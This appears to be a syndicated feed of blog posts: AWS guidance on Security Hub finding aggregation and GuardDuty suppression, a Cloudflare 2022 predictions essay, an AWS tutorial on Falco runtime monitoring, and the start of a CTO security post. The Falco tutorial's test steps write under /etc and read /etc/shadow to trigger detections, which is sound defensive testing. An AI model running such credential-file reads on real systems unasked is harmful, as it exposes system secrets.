You can enable AWS Security Hub finding aggregation using either the console or CLI. You must enable finding aggregation from the Region that will be the aggregation Region.

To enable Security Hub finding aggregation from the console

To enable AWS Security Hub finding aggregation using the AWS console:

  1. Start by navigating to the AWS Security Hub console and select Settings on the left side of the screen. Once on the settings page, choose the Regions tab.
Figure 1. Enabling finding aggregation

  2. Check the checkbox to Link future Regions. As AWS releases new Regions, their results will automatically be aggregated into your designated Region. If this checkbox is not checked, any new Region that is released will not aggregate Security Hub findings to the aggregation Region.

To enable Security Hub finding aggregation using the CLI

Alternatively, you can enable AWS Security Hub finding aggregation using the CLI by using the following command:

aws securityhub create-finding-aggregator --region <aggregation Region> --region-linking-mode ALL_REGIONS | ALL_REGIONS_EXCEPT_SPECIFIED | SPECIFIED_REGIONS --regions <Region list>

Here’s a sample CLI command to enable AWS Security Hub finding aggregation:

aws securityhub create-finding-aggregator --region us-east-1 --region-linking-mode SPECIFIED_REGIONS --regions us-west-1,us-west-2
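
If you prefer the AWS SDK for Python (Boto3) over the CLI, a minimal equivalent sketch looks like this; create the client in the Region you want to use as the aggregation Region:

import boto3

# Create the client in the intended aggregation Region
securityhub = boto3.client("securityhub", region_name="us-east-1")

response = securityhub.create_finding_aggregator(
    RegionLinkingMode="SPECIFIED_REGIONS",
    Regions=["us-west-1", "us-west-2"]
)
print(response["FindingAggregatorArn"])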

For more details about AWS Security Hub cross-Region aggregation, see Aggregating findings across Regions.

Consolidating downstream SIEM and ticketing integrations

Security Hub findings for all AWS accounts in your environment should be integrated into a Security Information and Event Management (SIEM) solution, such as Amazon OpenSearch Service or an APN partner SIEM, or a standardized ticketing system such as JIRA or ServiceNow.

You should send all Security Hub findings to a SIEM or ticketing solution from a single aggregation point to simplify operational overhead. Although integration architectures vary, as an example, this might mean configuring an Amazon EventBridge rule to parse and send findings to AWS Lambda or Amazon Kinesis for a custom integration point with the SIEM or ticketing solution.

You should configure this integration point in a single delegated administrator account across all member AWS accounts and aggregated Regions. You should avoid having multiple integration points between each Security Hub Region and your SIEM or ticketing solution, to avoid the unnecessary operational overhead and cost of managing multiple integration points and the resources required to stream findings to your SIEM.

Collecting Security Hub findings in a SIEM or ticketing solution can help you correlate findings across many other log sources. For example, you might use a SIEM solution to analyze operating system logs from an Amazon Elastic Compute Cloud (Amazon EC2) instance and correlate them with GuardDuty findings collected by Security Hub to investigate suspicious activity. You could also use ServiceNow or JIRA to create an automated, bidirectional integration with these ticketing solutions that keeps your Security Hub findings and issues in sync.

Auto-archive GuardDuty findings associated with global resources

Amazon GuardDuty creates findings associated with AWS IAM resources. IAM resources are global resources, which means that they are not Region-specific. If GuardDuty generates a finding for an IAM API call that is not Region-specific, such as ListGroups (for example, PenTest:IAMUser/KaliLinux), that finding is created in all GuardDuty Regions and ingested into Security Hub in every Region. You should implement suppression rules in GuardDuty so that you don’t have multiple copies of this finding in your Security Hub delegated administrator account finding aggregation Region.

To implement AWS GuardDuty suppression rules (Console)

To reduce the duplication of findings in Security Hub, suppress global GuardDuty findings in all Regions except the Security Hub aggregation Region. For example, if you are aggregating Security Hub findings in us-east-1 and your environment uses all commercial AWS Regions in the United States, you would add a suppression rule in GuardDuty in us-east-2, us-west-1, and us-west-2.

To create AWS GuardDuty suppression rules using the AWS console:

  1. Navigate to the GuardDuty console and select the Findings link on the left side of the screen.
Figure 2. Creating GuardDuty suppression rules

  2. Filter to search for the findings you want to suppress, and click Save / edit in the search bar.
  3. Enter a name and description for the suppression rule and save it.

To implement AWS GuardDuty suppression rules (CLI)

Alternatively, you can create AWS GuardDuty suppression rules using the CreateFilter API via CLI.

  1. Create a JSON file with your desired suppression filter criteria for the suppression rule.
  2. The following CLI command will test your filter criteria for AWS GuardDuty findings that will be suppressed:

     aws guardduty list-findings --detector-id 12abc34d567e8fa901bc2d34e56789f0 --finding-criteria file://criteria.json

  3. The following CLI command will create a filter for AWS GuardDuty findings that will be suppressed:

     aws guardduty create-filter --action ARCHIVE --detector-id 12abc34d567e8fa901bc2d34e56789f0 --name yourfiltername --finding-criteria file://criteria.json
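
As a rough Boto3 sketch of the same two steps, the following previews and then creates a suppression rule; the finding type, filter name, and detector ID are illustrative values to replace with your own:

import boto3

guardduty = boto3.client("guardduty", region_name="us-east-2")

detector_id = "12abc34d567e8fa901bc2d34e56789f0"  # example detector ID from the CLI samples above

# Illustrative criteria: suppress a finding type tied to a global IAM API call
finding_criteria = {
    "Criterion": {
        "type": {"Equals": ["PenTest:IAMUser/KaliLinux"]}
    }
}

# Preview which findings the criteria would match
matches = guardduty.list_findings(DetectorId=detector_id, FindingCriteria=finding_criteria)
print(matches["FindingIds"])

# Create the suppression rule, which archives matching findings automatically
guardduty.create_filter(
    DetectorId=detector_id,
    Name="suppress-global-iam-findings",
    Action="ARCHIVE",
    FindingCriteria=finding_criteria
)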

For more details about creating AWS GuardDuty suppression rules, see Creating AWS GuardDuty suppression rules.

Reduce AWS Config cost by recording global resources in one Region

Like GuardDuty, AWS Config also records supported types of global resources, which are not tied to a specific Region and can be used in all Regions. The global resource types that AWS Config supports are IAM users, groups, roles, and customer managed policies. The configuration details for a specific global resource are the same in all Regions. If you have the AWS Security Hub AWS Foundational Best Practices standard enabled, it includes certain checks against global resources in AWS Config that you need to disable in all Regions except the aggregation Region.

Customize AWS Config for global resources

If you customize AWS Config in multiple Regions to record global resources, AWS Config creates multiple configuration items each time a global resource changes, one configuration item for each Region. Costs for each configuration item can be found on AWS Config pricing. These configuration items will contain identical data. To prevent duplicate configuration items, consider customizing AWS Config in only one Region to record global resources, unless you want those configuration items to be available in multiple Regions. See this blog post for a comprehensive list of additional AWS Config best practices.

To customize AWS Config for global resources (Console)

Follow the steps below to change the AWS Config global resource configuration in the AWS Console.

  1. Navigate to the AWS Config console and select Settings on the left side of the screen.
  2. Click Edit in the top right corner.
  3. Uncheck the Include global resources checkbox.
  4. Repeat these steps for each Region where AWS Config is enabled, except the Region where you would like to track global resources.
Figure 3. AWS Config global resource setting

To customize AWS Config for global resources (CLI)

Alternatively, you can disable the global resource tracking in AWS Config using the CLI.

aws configservice put-configuration-recorder --configuration-recorder name=default,roleARN=arn:aws:iam::123456789012:role/config-role --recording-group allSupported=true,includeGlobalResourceTypes=false

If you have deployed AWS Config using these CloudFormation templates, set IncludeGlobalResourceTypes to False under AWS::Config::ConfigurationRecorder for the Regions where you do not want to track global resources, and set the value to True in the aggregation Region where you would like to track global resources. You can use the CloudFormation StackSets multiple AWS Region deployment feature to deploy the CloudFormation template in all AWS Regions where AWS Config is enabled.

For more details about AWS Config global resources, see Selecting AWS Config resources to record.

Disable AWS Security Hub AWS Foundational Best Practices periodic controls associated with global resources

The AWS Security Hub AWS Foundational Best Practices standard performs checks against the resources in your AWS environment using AWS Config rules. After you have disabled recording of AWS Config global resources in all Regions except the Region that runs global recording, disable the Security Hub controls that deal with global resources, as shown in Figure 5 below.

You can disable AWS Security Hub controls relating to global resources using the console or CLI.

To disable AWS Security Hub controls (Console)

Follow the steps below to disable Security Hub controls that deal with global resources in the AWS Console.

  1. Navigate to the Security Hub console and select Security Standards on the left side of the screen.
  2. Click on the AWS Foundational Security Best Practices v1.0.0 security standard.
  3. Then use the filter box to search for IAM. Now you should be able to see security controls IAM.1-IAM.7, which are Security Hub global controls.
    Figure 4. Security Hub global controls

  4. Click on each control and select Disable in the top right corner.
  5. After you have disabled the control, add a reason for disabling and choose Disable.
Figure 5. Disabling Security Hub control

Figure 5. Disabling Security Hub control

To disable AWS Security Hub controls (CLI)

Alternatively, you can disable Security Hub controls that deal with global resources using the CLI.

aws securityhub update-standards-control --standards-control-arn <control ARN> --control-status "DISABLED" --disabled-reason <description of reason to disable>

This sample CLI command disables Security Hub controls that deal with global resources:

aws securityhub update-standards-control --standards-control-arn "arn:aws:securityhub:us-east-1:123456789012:control/aws-foundational-security-best-practices/v/1.0.0/ACM.1" --control-status "DISABLED" --disabled-reason "Not applicable for my service"

You can also follow instructions to implement a solution to disable specific Security Hub controls for multiple AWS accounts.
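
As a rough illustration, the following Boto3 sketch disables the IAM-related controls (IAM.1 through IAM.7) in one Region; the Region, account ID, and disabled reason are placeholders, and you would run it (or the equivalent CLI commands) in each Region where global recording is disabled:

import boto3

REGION = "us-west-2"  # a Region where AWS Config global recording is disabled
ACCOUNT_ID = "123456789012"

securityhub = boto3.client("securityhub", region_name=REGION)

for control in ["IAM.1", "IAM.2", "IAM.3", "IAM.4", "IAM.5", "IAM.6", "IAM.7"]:
    control_arn = (
        f"arn:aws:securityhub:{REGION}:{ACCOUNT_ID}:control/"
        f"aws-foundational-security-best-practices/v/1.0.0/{control}"
    )
    securityhub.update_standards_control(
        StandardsControlArn=control_arn,
        ControlStatus="DISABLED",
        DisabledReason="Global resources are recorded in the aggregation Region only"
    )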

Be sure to disable the Security Hub controls only in the Regions where global recording is also disabled. Verify that the Security Hub controls associated with global resources remain enabled in the Region where AWS Config global resource recording is enabled.

After you have completed disabling these controls and the recording of global resources, proceed to disable the [Config.1] AWS Config should be enabled control in those same Regions. This specific control requires recording of global resources in order to pass, which you do not need enabled in multiple Regions.

For more details about AWS Security Hub controls, see Disabling and enabling individual AWS Security Hub controls.

Implement automatic remediation from a central Region

Once findings are consolidated and ingested into Security Hub across all your organization’s AWS accounts, you should implement auto-remediation where possible, including everything from resource misconfigurations to automated quarantine of infected EC2 instances. Security Hub provides multiple ways to achieve this through end-to-end automation with EventBridge or through human-triggered automation with Security Hub Custom Actions. You can deploy automatic remediation solutions in a single Region to perform cross-Region remediation. This helps you deploy fewer resources, saving money and operational overhead. For more information on how to enable the solution for Security Hub Automated Response and Remediation, see this blog post.

If you have automation currently in place, it’s important to understand how findings from multiple Regions triggering your automation might be affected. For example, you might have a Lambda function that remediates problems with S3 buckets, and that assumes it is being invoked in the same Region as the S3 bucket it needs to remediate. With cross-Region aggregation, your Lambda might need to make a cross-Region AWS SDK call. The Lambda function will run in the Region where the aggregation occurs, but the bucket could be in another Region, so you might have to adjust your function to handle that situation. Also, the role associated with the Lambda function could have its privileges limited to a single Region. If you intend the same function to work in all Regions, you might need to change the IAM policy for the IAM role used by the Lambda. Make sure to check Service Control Policies in AWS Organizations, if you use them, because they can also deny actions in one Region while allowing them in another Region.
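
As a rough sketch of that pattern, a remediation function can create its service client in the Region recorded on the finding's resource rather than in its own Region; the finding structure handling and remediation action below are illustrative:

import boto3

def remediate_public_bucket(finding: dict) -> None:
    # The finding carries the Region of the affected resource, which may differ
    # from the Region where this function runs (the aggregation Region)
    resource = finding["Resources"][0]
    bucket_region = resource.get("Region", "us-east-1")
    bucket_name = resource["Id"].split(":::")[-1]

    # Create the client in the resource's Region so the API call lands in the right place
    s3 = boto3.client("s3", region_name=bucket_region)
    s3.put_public_access_block(
        Bucket=bucket_name,
        PublicAccessBlockConfiguration={
            "BlockPublicAcls": True,
            "IgnorePublicAcls": True,
            "BlockPublicPolicy": True,
            "RestrictPublicBuckets": True,
        },
    )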

When enabling cross-Region finding aggregation, you’ll need to understand how any automatic remediation that might be in place today could be affected. Be sure to test your remediation functions on resources in various Regions, to be sure remediation works in all Regions you monitor.

Conclusion

This blog post highlights configurations you can take advantage of to reduce operational overhead and provide cost savings by using cross-Region finding aggregation in Security Hub. The examples given apply to the majority of AWS environments, and are meant to be action items you can use to improve the overall security and operational effectiveness of your AWS environment.

If you have feedback about this post, submit comments in the Comments section below. If you have any questions about this post, start a thread on the re:Post forum.

Want more AWS Security news? Follow us on Twitter.

Author

Marshall Jones

Marshall is a Worldwide Security Specialist Solutions Architect at AWS. His background is in AWS consulting and security architecture, focused on a variety of security domains including edge, threat detection, and compliance. Today, he is focused on helping enterprise AWS customers adopt and operationalize AWS security services to increase security effectiveness and reduce risk.

Author

Jonathan Nguyen

Jonathan is a Shared Delivery Team Senior Security Consultant at AWS. His background is in AWS Security with a focus on Threat Detection and Incident Response. Today, he helps enterprise customers develop a comprehensive AWS Security strategy, deploy security solutions at scale, and train customers on AWS Security best practices.

Looking Forward: Some Predictions for 2022

Post Syndicated from John Engates original https://blog.cloudflare.com/predictions-for-2022/

Looking Forward: Some Predictions for 2022


As the year comes to a close, I often reflect and make predictions about what’s to come in the next. I’ve written end-of-year predictions posts in the past, but this is my first one at Cloudflare. I joined as Field CTO in September and currently enjoy the benefit of a long history in the Internet industry with fresh eyes regarding Cloudflare. I’m excited to share a few of my thoughts as we head into the new year. Let’s go!

“Never make predictions, especially about the future.”
Casey Stengel

Adapting to a 5G world

Over the last few years, 5G networks have begun to roll out gradually worldwide. When carriers bombard us with holiday ads touting their new 5G networks, it can be hard to separate hype from reality. But 5G technology is real, and the promise for end-users is vastly more wireless bandwidth and lower network latency. Better network performance will make websites, business applications, video streaming, online games, and emerging technologies like AR/VR all perform better.

The trend of flexible work will also likely increase the adoption of 5G mobile and fixed wireless broadband. Device makers will ship countless new products with embedded 5G in the coming year. Remote workers will eagerly adopt new technology that improves Internet performance and reliability.

Companies will also invest heavily in 5G to deliver better experiences for their employees and customers. Developers will start re-architecting applications where more wireless “last mile”  bandwidth and lower wireless latency will have the most benefit. Similarly, network architects will seek solutions to improve the end-to-end performance of the entire network. In 2022, we’ll see massive investment and increased competition around 5G amongst network operators and cloud providers. Customers will gravitate to partners who can balance 5G network adoption with the most significant impact and the least cost and effort.

The talent is out there; it’s “just not evenly distributed.”

For various reasons, large numbers of workers changed jobs this year. In what has been called “the great resignation,” some claim there’s now a shortage of experienced tech workers. I’d argue that it’s more of a “great reshuffle” and consequently a race to attract and hire the best talent.

Work has changed profoundly due to the global pandemic over the last two years. People are now searching, applying, interviewing, onboarding, and working entirely remotely. Anyone looking to change jobs is likely evaluating potential employers on the working environment more than they did pre-2020.

Jobseekers are evaluating employers on different criteria than in the past. Does video conferencing work reliably? How streamlined is access to the software and tools I use every day? Can I work securely from different locations, or do the company’s security controls and VPN make it difficult to work flexibly?

Employers must make working flexibly easy and secure to attract the best talent. Even small amounts of digital friction are frustrating for workers and wasteful for employers. CIOs must take the lead and optimize the fully-digital, flexible work experience to compete for the very best talent. In 2022, I predict technology and tools will increasingly tip the balance in the talent war, and companies will look for every technological advantage to attract the talent they need.

Cloud Simply Increases

To eliminate some strain on employees, companies will search for ways to simplify their business processes and automate as much as possible. IT leaders will look for tasks they can outsource altogether. The best collaboration software and productivity tools tend to be delivered as-a-service.

It’s easy to predict more cloud adoption. But I don’t expect most companies to keep pace with how fast the cloud evolves. I was recently struck by how many services are now part of cloud provider portfolios. It isn’t easy for many companies to train employees and absorb these products fast enough. Another challenge is that more cloud adoption means CEOs are often caught off guard by how much they are spending on the cloud. Lastly, there’s the risk that employee turnover means your cloud expertise sometimes walks out the door.

I predict companies will continue to adopt the cloud quickly, but IT leaders will expect cloud services to simplify instead of adding more complexity. Companies need the cloud to solve problems, not just provide the building blocks. IT leaders will ask for more bang for the buck and squeeze more value from their cloud partners to keep costs under control.

I also look forward to CIOs putting pressure on cloud providers to play nice with others and stop holding companies hostage. We believe egregious egress charges are a barrier to cloud adoption, and eliminating them would remove much of the cost and frustration associated with integrating services and leveraging multiple clouds.

“Everything should be made as simple as possible, but not simpler.”
Albert Einstein

Security is only getting more complicated. Companies must embrace zero trust

Throughout 2021, Cloudflare observed a steady rise in bot traffic and ever-larger DDoS attacks. As an industry, we’ve seen the trends of more phishing attempts and high-profile ransomware attacks. The recent emergence of the Log4j vulnerability has reminded us that security doesn’t take a holiday.

Given the current threat landscape, how do we protect our companies? Can we stop blaming users for clicking phishing emails? How do we isolate bad actors if they happen to find a new zero-day exploit like Log4j?

The only trend I see that brings me hope is zero trust. It’s been on the radar for a few years, and some companies have implemented point-products that are called zero trust. But zero trust isn’t a product or industry buzzword. Zero trust is an overarching security philosophy. In my opinion, far too few companies have embraced zero trust as such.

In 2022, CIOs and CISOs will increasingly evaluate (or reevaluate) technologies and practices in their security toolkit through the lens of zero trust. It should not matter how invested IT leaders are in existing security technology. Everything should be scrutinized, from managing networks and deploying firewalls to authenticating users and securing access to applications. If it doesn’t fit in the context of zero trust, IT managers should probably replace it.

The security-as-a-service model will tend to win for the same reasons I predicted more cloud. Namely, solving security problems as simply as possible with the fewest headcount required.

The corporate network (WAN) is dead. Long live the (Internet-based) corporate network

I can’t pinpoint the official time of death of the corporate WAN, but it was sometime between the advent of fiber-to-the-home and 5G wireless broadband. The corporate network has long suffered from high costs and inflexibility. SD-WAN was the prescription that extended the corporate network’s life, but work-from-home made the corporate network an anachronism.

Video conferencing and SaaS apps now run better at home than at the office for many of us. And the broader rollout of 5G will make things even better for mobile users. Your old VPN will soon disappear too. Shutting down the legacy VPN should be a badge of honor for the CISO. It’s a sign that the company has replaced the castle-and-moat perimeter firewall architecture and is embracing the zero trust security model.

In 2022 and beyond, the Internet will become the only network that matters for most users and companies. SaaS adoption and continued flexible work arrangements will lead companies to give up the idea of the traditional corporate network. IT leaders will likely cut budgets for existing WAN infrastructure to invest in more effective end-user productivity.

Matters of Privacy

Social media whistleblowers, end-to-end encryption, and mobile device privacy were on the minds of consumers in 2021. Consumers want to know whom they’re buying from and sharing data with, whether those companies are trustworthy, and what they do with the collected data.

Data privacy for businesses is critical to get right due to the scope of the privacy issues at hand. Historically, as some digital enterprises grew, there was a race to collect as much data as possible about their users and use it to generate revenue. The EU General Data Protection Regulation (GDPR) has turned that around and forced companies to reevaluate their data collection practices. It has put power back into the hands of users and consumers.

GDPR is just one set of rules regulating the use of data about citizens. The US, EU, China, Russia, India, and Brazil have different views and regulations on privacy. Data privacy rules will not evolve the same everywhere, and it will be increasingly difficult for companies to navigate the patchwork of regulations around the globe.

Just as security is now a part of every software delivery stage, privacy needs to be considered throughout the development process. I predict that in 2022 and beyond, companies will architect applications with privacy laws in mind from the outset. About a year ago, we announced Cloudflare Data Localization Suite, which helps businesses take advantage of our global network’s performance and security benefits while making it easy to set rules to control where their data is handled automatically.

Another trend that spans the domains of privacy, security, and remote work is user preference for a single device for both personal and work-related activities. Carrying two or more devices is a hassle, but maintaining privacy and security on an unmanaged device presents challenges for IT. We will move away from the traditional tightly controlled, IT-managed device with time. Browser isolation and the evolution of zero trust security controls will get us closer to this holy grail of end-user device independence.

Conclusion

We have much to be thankful for, even with the challenges we’ve all faced in 2021. 2022 may well be as challenging as this year has been, but I predict it will be a great year, nonetheless. We’ll work hard, learn from our mistakes, and ultimately adapt to whatever life and work throw at us. At least that’s my plan for next year!

Continuous runtime security monitoring with AWS Security Hub and Falco

Post Syndicated from Rajarshi Das original https://aws.amazon.com/blogs/security/continuous-runtime-security-monitoring-with-aws-security-hub-and-falco/

Customers want a single and comprehensive view of the security posture of their workloads. Runtime security event monitoring is important to building secure, operationally excellent, and reliable workloads, especially in environments that run containers and container orchestration platforms. In this blog post, we show you how to use services such as AWS Security Hub and Falco, a Cloud Native Computing Foundation project, to build a continuous runtime security monitoring solution.

With the solution in place, you can collect runtime security findings from multiple AWS accounts running one or more workloads on AWS container orchestration platforms, such as Amazon Elastic Kubernetes Service (Amazon EKS) or Amazon Elastic Container Service (Amazon ECS). The solution collates the findings across those accounts into a designated account where you can view the security posture across accounts and workloads.

 

Solution overview

Security Hub collects security findings from other AWS services using a standardized AWS Security Findings Format (ASFF). Falco provides the ability to detect security events at runtime for containers. Partner integrations like Falco are also available on Security Hub and use ASFF. Security Hub provides a custom integrations feature using ASFF to enable collection and aggregation of findings that are generated by custom security products.

The solution in this blog post uses AWS FireLens, Amazon CloudWatch Logs, and AWS Lambda to enrich logs from Falco and populate Security Hub.
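As a rough illustration of what that Lambda function does (the field mapping in the published sample is more complete, so treat this as a sketch rather than the actual implementation), the following assumes a CloudWatch Logs subscription payload whose log lines are Falco JSON alerts and imports them with the BatchImportFindings API:

import base64
import gzip
import json
import os
from datetime import datetime, timezone

import boto3

securityhub = boto3.client("securityhub")

def handler(event, context):
    # CloudWatch Logs delivers the subscription payload as base64-encoded gzip.
    payload = json.loads(gzip.decompress(base64.b64decode(event["awslogs"]["data"])))
    account_id = payload["owner"]
    region = os.environ["AWS_REGION"]
    now = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")

    findings = []
    for log_event in payload["logEvents"]:
        alert = json.loads(log_event["message"])  # Falco emits one JSON alert per line
        findings.append({
            "SchemaVersion": "2018-10-08",
            "Id": f"falco-{log_event['id']}",
            # Default product ARN used for custom findings sent via BatchImportFindings.
            "ProductArn": f"arn:aws:securityhub:{region}:{account_id}:product/{account_id}/default",
            "GeneratorId": alert.get("rule", "falco-rule"),
            "AwsAccountId": account_id,
            "Types": ["Software and Configuration Checks"],
            "CreatedAt": now,
            "UpdatedAt": now,
            "Severity": {"Label": "HIGH" if alert.get("priority") in ("Critical", "Error") else "MEDIUM"},
            "Title": alert.get("rule", "Falco runtime alert"),
            "Description": alert.get("output", "")[:1024],
            "Resources": [{"Type": "Container", "Id": alert.get("hostname", "unknown"), "Region": region}],
        })

    if findings:
        securityhub.batch_import_findings(Findings=findings)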


Figure 1: Architecture diagram of continuous runtime security monitoring

Here’s how the solution works, as shown in Figure 1:

  1. An AWS account is running a workload on Amazon EKS.
    1. Runtime security events detected by Falco for that workload are sent to CloudWatch logs using AWS FireLens.
    2. CloudWatch Logs stores the events delivered by FireLens and acts as the trigger for the Lambda function in the next step.
    3. The Lambda function transforms the logs into the ASFF. These findings can now be imported into Security Hub.
    4. The Security Hub instance that is running in the same account as the workload running on Amazon EKS stores and processes the findings provided by Lambda and provides the security posture to users of the account. This instance also acts as a member account for Security Hub.
  2. Another AWS account is running a workload on Amazon ECS.
    1. Runtime security events detected by Falco for that workload are sent to CloudWatch logs using AWS FireLens.
    2. CloudWatch Logs stores the events delivered by FireLens and acts as the trigger for the Lambda function in the next step.
    3. The Lambda function transforms the logs into the ASFF. These findings can now be imported into Security Hub.
    4. The Security Hub instance that is running in the same account as the workload running on Amazon ECS stores and processes the findings provided by Lambda and provides the security posture to users of the account. This instance also acts as another member account for Security Hub.
  3. The designated Security Hub administrator account combines the findings generated by the two member accounts, and then provides a comprehensive view of security alerts and security posture across AWS accounts. If your workloads span multiple Regions, Security Hub supports aggregating findings across Regions.

 

Prerequisites

For this walkthrough, you should have the following in place:

  1. Three AWS accounts.

    Note: We recommend three accounts so you can experience Security Hub’s support for a multi-account setup. However, you can use a single AWS account instead to host the Amazon ECS and Amazon EKS workloads, and send findings to Security Hub in the same account. If you are using a single account, skip the following account-specific guidance. If you are integrated with AWS Organizations, the designated Security Hub administrator account will automatically have access to the member accounts.

  2. Security Hub set up with an administrator account on one account.
  3. Security Hub set up with member accounts on two accounts: one account to host the Amazon EKS workload, and one account to host the Amazon ECS workload.
  4. Falco set up on the Amazon EKS and Amazon ECS clusters, with logs routed to CloudWatch Logs using FireLens. For instructions on how to do this, see:

    Important: Take note of the names of the CloudWatch Logs groups, as you will need them in the next section.

  5. AWS Cloud Development Kit (CDK) installed on the member accounts to deploy the solution that provides the custom integration between Falco and Security Hub.

 

Deploying the solution

In this section, you will learn how to deploy the solution and enable the CloudWatch Logs group. Enabling the CloudWatch Logs group is the trigger for running the Lambda function in both member accounts.

To deploy this solution in your own account

  1. Clone the aws-securityhub-falco-ecs-eks-integration GitHub repository by running the following command.
    $ git clone https://github.com/aws-samples/aws-securityhub-falco-ecs-eks-integration
  2. Follow the instructions in the README file provided on GitHub to build and deploy the solution. Make sure that you deploy the solution to the accounts hosting the Amazon EKS and Amazon ECS clusters.
  3. Navigate to the AWS Lambda console and confirm that you see the newly created Lambda function. You will use this function in the next section.

Figure 2: Lambda function for Falco integration with Security Hub

To enable the CloudWatch Logs group

  1. In the AWS Management Console, select the Lambda function shown in Figure 2—AwsSecurityhubFalcoEcsEksln-lambdafunction—and then, on the Function overview screen, select + Add trigger.
  2. On the Add trigger screen, provide the following information and then select Add, as shown in Figure 3.
    • Trigger configuration – From the drop-down, select CloudWatch logs.
    • Log group – Choose the Log group you noted in Step 4 of the Prerequisites. In our setup, the log group for the Amazon ECS and Amazon EKS clusters, deployed in separate AWS accounts, was set with the same value (falco).
    • Filter name – Provide a name for the filter. In our example, we used the name falco.
    • Filter pattern – optional – Leave this field blank.

    Figure 3: Lambda function trigger – CloudWatch Log group

  3. Repeat these steps (as applicable) to set up the trigger for the Lambda function deployed in other accounts.

 

Testing the deployment

Now that you’ve deployed the solution, you will verify that it’s working.

With the default rules, Falco generates alerts for activities such as:

  • An attempt to write to a file below the /etc folder. The /etc folder contains important system configuration files.
  • An attempt to open a sensitive file (such as /etc/shadow) for reading.

To test your deployment, you will attempt to perform these activities to generate Falco alerts that are reported as Security Hub findings in the same account. Then you will review the findings.

To test the deployment in member account 1

  1. Run the following commands to trigger an alert in member account 1, which is running an Amazon EKS cluster. Replace <container_name> with your own value.
    kubectl exec -it <container_name> -- /bin/bash
    touch /etc/5
    cat /etc/shadow > /dev/null
  2. To see the list of findings, log in to your Security Hub admin account and navigate to Security Hub > Findings. As shown in Figure 4, you will see the alerts generated by Falco, including the Falco-generated title, and the instance where the alert was triggered.


    Figure 4: Findings in Security Hub

  3. To see more detail about a finding, check the box next to the finding. Figure 5 shows some of the details for the finding Read sensitive file untrusted.

    Figure 5: Sensitive file read finding – detail view

    Figure 6 shows the Resources section of this finding, which includes the instance ID of the Amazon EKS cluster node. In our example, this is the Amazon Elastic Compute Cloud (Amazon EC2) instance.

    Figure 6: Resource Detail in Security Hub finding

To test the deployment in member account 2

  1. Run the following commands to trigger a Falco alert in member account 2, which is running an Amazon ECS cluster. Replace <container_id> with your own value.
    docker exec -it <container_id> bash
    touch /etc/5
    cat /etc/shadow > /dev/null
  2. As in the preceding example with member account 1, to view the findings related to this alert, navigate to your Security Hub admin account and select Findings.

To view the collated findings from both member accounts in Security Hub

  1. In the designated Security Hub administrator account, navigate to Security Hub > Findings. The findings from both member accounts are collated in the designated Security Hub administrator account. You can use this centralized account to view the security posture across accounts and workloads. Figure 7 shows two findings, one from each member account, viewable in this single-pane-of-glass administrator account.


    Figure 7: Write below /etc findings in a single view

  2. To see more information and a link to the corresponding member account where the finding was generated, check the box next to the finding. Figure 8 shows the account detail associated with a specific finding in member account 1.

    Figure 8: Write under /etc detail view in Security Hub admin account

    By centralizing and enriching the findings from Falco, you can take action more quickly or perform automated remediation on the impacted resources.

 

Cleaning up

To clean up this demo:

  1. Delete the CloudWatch Logs trigger from the Lambda functions that were created in the section To enable the CloudWatch Logs group.
  2. Delete the Lambda functions by deleting the CloudFormation stack, created in the section To deploy this solution in your own account.
  3. Delete the Amazon EKS and Amazon ECS clusters created as part of the Prerequisites.

 

Conclusion

In this post, you learned how to achieve multi-account continuous runtime security monitoring for container-based workloads running on Amazon EKS and Amazon ECS. This is achieved by creating a custom integration between Falco and Security Hub.

You can extend this solution in a number of ways. For example:

  • You can forward findings from all accounts to security information and event management (SIEM) tools, such as Splunk, from this single source.
  • You can perform automated remediation activities based on the findings generated, using Lambda.

To learn more about managing a centralized Security Hub administrator account, see Managing administrator and member accounts. To learn more about working with ASFF, see AWS Security Finding Format (ASFF) in the documentation. To learn more about the Falco engine and rule structure, see the Falco documentation.

If you have feedback about this post, submit comments in the Comments section below.

Want more AWS Security news? Follow us on Twitter.


Rajarshi Das

Rajarshi is a Solutions Architect at Amazon Web Services. He focuses on helping Public Sector customers accelerate their security and compliance certifications and authorizations by architecting secure and scalable solutions. Rajarshi holds 4 AWS certifications including AWS Certified Solutions Architect – Professional and AWS Certified Security – Specialty.

Author

Adam Cerini

Adam is a Senior Solutions Architect with Amazon Web Services. He focuses on helping Public Sector customers architect scalable, secure, and cost effective systems. Adam holds 5 AWS certifications including AWS Certified Solutions Architect – Professional and AWS Certified Security – Specialty.

Insights for CTOs: Part 2 – Enable Good Decisions at Scale with Robust Security

Post Syndicated from Syed Jaffry original https://aws.amazon.com/blogs/architecture/insights-for-ctos-part-2-enable-good-decisions-at-scale-with-robust-security/

In my role as a Senior Solutions Architect, I have spoken to chief technology officers (CTOs) and executive leadership of large enterprises like big banks, software as a service (SaaS) businesses, mid-sized enterprises, and startups.

In this 6-part series, I share insights gained from various CTOs during their cloud adoption journeys at their respective organizations. I have taken these lessons and summarized architecture best practices to help you build and operate applications successfully in the cloud. This series will also cover topics on building and operating cloud applications, security, cloud financial management, modern data and artificial intelligence (AI), cloud operating models, and strategies for cloud migration.

In part 2, my colleague Paul Hawkins and I will show you how to effectively communicate organization-wide security processes. This will ensure you can make informed decisions to scale effectively. We also describe how to establish robust security controls using best practices from the Security Pillar of the Well-Architected Framework.

Effectively establish and communicate security processes

To ensure your employees, customers, contractors, etc., understand your organization’s security goals, make sure that people know the what, how, and why behind your security objectives:

  • What are the overall objectives they need to meet?
  • How do you intend for the organization and your customers to work together to meet these goals?
  • Why are meeting these goals important to your organization and customers?

Having well communicated security principles gives a common understanding of overall objectives. Once you communicate these goals, you can get more specific in terms of how those objectives can be achieved.

The next sections discuss best practices to establish your organization’s security processes.

Create a “path to production” process

A “path to production” process is a set of consistent and reusable engineering standards and steps that each new cloud workload must adhere to prior to production deployment. Using this process will increase delivery velocity while reducing business risk by ensuring strong compliance to standards.

Classify your data for better access control

Understanding the type of data that you are handling and where it is being handled is critical to understanding what you need to do to appropriately protect it. For example, the requirements for a public website are different than a payment processing workload. By knowing where and when sensitive data is being accessed or used, you can more easily assess and establish the appropriate controls.

Figure 1 shows a scale that will help you determine when and how to protect sensitive data. It shows that you would apply stricter access controls for more sensitive data to reduce the risk of inappropriate access. Detective controls allow you to audit and respond to unexpected access.

By simplifying the baseline control posture across all environments and layering on stricter controls where appropriate, you will make it easier to deliver change more swiftly while maintaining the right level of security.


Figure 1. Data classification and control scale

Identify and prioritize how to address risks using a threat model

As shown in the How to approach threat modeling blog post, threat modeling helps workload teams identify potential threats and develop or implement security controls to address those threats.

